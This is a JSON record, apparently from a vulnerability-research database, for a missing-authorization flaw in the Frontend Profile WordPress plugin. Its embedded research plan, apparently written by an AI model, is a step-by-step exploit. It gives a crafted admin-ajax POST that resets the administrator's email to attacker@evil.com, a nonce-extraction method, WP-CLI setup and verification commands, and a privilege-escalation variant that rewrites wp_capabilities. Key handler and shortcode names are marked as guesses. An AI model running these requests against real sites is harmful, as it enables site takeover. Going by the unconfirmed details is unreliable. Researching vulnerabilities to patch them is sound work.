[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f509aETyCtWgQrK2BxLGr4MyAIW2I7oHo2zZoshzRGLA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":24,"research_started_at":25,"research_completed_at":26,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":27},"CVE-2026-39688","frontend-profile-missing-authorization","Frontend Profile \u003C= 1.3.9 - Missing Authorization","The Frontend Profile plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.3.9. This makes it possible for unauthenticated attackers to perform an unauthorized action.","wp-front-end-profile",null,"\u003C=1.3.9","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-23 00:00:00","2026-04-15 21:30:04",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F75d65a82-145e-4d73-9c9d-8792a3d05d7e?source=api-prod",[],"researched",false,3,"This research plan outlines the steps required to exploit a missing authorization vulnerability in the **WP Frontend Profile** plugin (version \u003C= 1.3.9).\n\n### 1. Vulnerability Summary\nThe **WP Frontend Profile** plugin is vulnerable to Missing Authorization. An unauthenticated attacker can exploit this by sending a specially crafted AJAX request to the `wp_ajax_nopriv_wpfp_save_profile` (inferred) handler. The function responsible for updating user profiles fails to verify if the requester has the authority to modify the targeted `user_id`. This allows an attacker to change profile details (such as the email address) of any user, including administrators, which can lead to full site takeover via password reset.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `wpfp_save_profile` (inferred)\n*   **Method:** POST\n*   **Parameters:**\n    *   `action`: `wpfp_save_profile`\n    *   `user_id`: The ID of the target user (e.g., `1` for the primary admin).\n    *   `email`: The new email address to assign to the user.\n    *   `wpfp_nonce`: A valid CSRF token.\n*   **Authentication:** None (Unauthenticated via `wp_ajax_nopriv_`).\n*   **Preconditions:** A valid nonce must be obtained from the frontend.\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the AJAX action during `init` or in the constructor:\n    `add_action( 'wp_ajax_nopriv_wpfp_save_profile', 'wpfp_save_profile_action' );`\n2.  **Handler Entry:** The function `wpfp_save_profile_action()` is called.\n3.  **Missing Check:** The code likely calls `check_ajax_referer( 'wpfp_nonce', 'wpfp_nonce' )` but fails to call `current_user_can( 'edit_user', $user_id )`.\n4.  **Sinks:** The user-provided `user_id` and profile data (like `email`) are passed directly into `wp_update_user()` or `update_user_meta()`.\n\n### 4. Nonce Acquisition Strategy\nThe plugin likely enqueues its AJAX script and localizes a nonce on pages where the profile editing form is present.\n\n1.  **Identify Shortcode:** The plugin uses `[wpfp_full_profile]` or `[wpfp_edit_profile]` (inferred) to display the profile editor.\n2.  **Create Page:** Use WP-CLI to create a public page containing this shortcode.\n3.  **Navigate:** Use the `browser_navigate` tool to visit the created page.\n4.  **Extract Nonce:** Use `browser_eval` to extract the nonce from the localized JavaScript object. The localization key is typically `wpfp_ajax`.\n    *   **JavaScript Command:** `window.wpfp_ajax?.nonce` or `window.wpfp_ajax?.wpfp_nonce` (inferred).\n\n### 5. Exploitation Strategy\n1.  **Setup Phase:** Create a page with the shortcode to make the nonce available.\n2.  **Information Gathering:** Navigate to the page and extract the nonce using the browser console\u002Feval.\n3.  **Execution Phase:** Send a POST request to `admin-ajax.php` targeting User ID 1.\n\n**HTTP Request Payload:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=wpfp_save_profile&user_id=1&email=attacker@evil.com&wpfp_nonce=[EXTRACTED_NONCE]\n```\n\n*Note: Use the `http_request` tool with the body formatted as a URL-encoded string.*\n\n### 6. Test Data Setup\n1.  **Admin User:** Ensure a user with `ID 1` exists (default WordPress setup).\n2.  **Shortcode Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Profile Edit\" --post_status=publish --post_content='[wpfp_full_profile]'\n    ```\n3.  **Target Details:** Note the original email of the admin:\n    ```bash\n    wp user get 1 --field=user_email\n    ```\n\n### 7. Expected Results\n*   The AJAX response should return a success status (e.g., `{\"success\":true}` or a redirect\u002FHTML snippet).\n*   The database record for User ID 1 should now reflect the attacker-supplied email address.\n\n### 8. Verification Steps\nAfter sending the exploit request, verify the change using WP-CLI:\n```bash\n# Check if the email was updated for the admin user\nwp user get 1 --field=user_email\n```\nIf the output is `attacker@evil.com`, the exploitation is successful.\n\n### 9. Alternative Approaches\n*   **Meta Update:** If the `wpfp_save_profile` action doesn't allow email updates, check if it accepts arbitrary meta keys. If so, attempt to update `wp_capabilities` to `a:1:{s:13:\"administrator\";b:1;}` for a low-privileged user the attacker controls.\n*   **Action Name Brute Force:** If `wpfp_save_profile` is incorrect, search the plugin directory for all `wp_ajax_nopriv` registrations:\n    ```bash\n    grep -rn \"wp_ajax_nopriv_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fwp-front-end-profile\u002F\n    ```\n*   **Nonce Check Bypass:** If the nonce check is present but uses a generic action string like `-1`, try using a nonce obtained from a different frontend script or the REST API.","gemini-3-flash-preview","2026-04-19 01:26:36","2026-04-19 01:26:55",{"type":28,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":29},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-front-end-profile\u002Ftags"]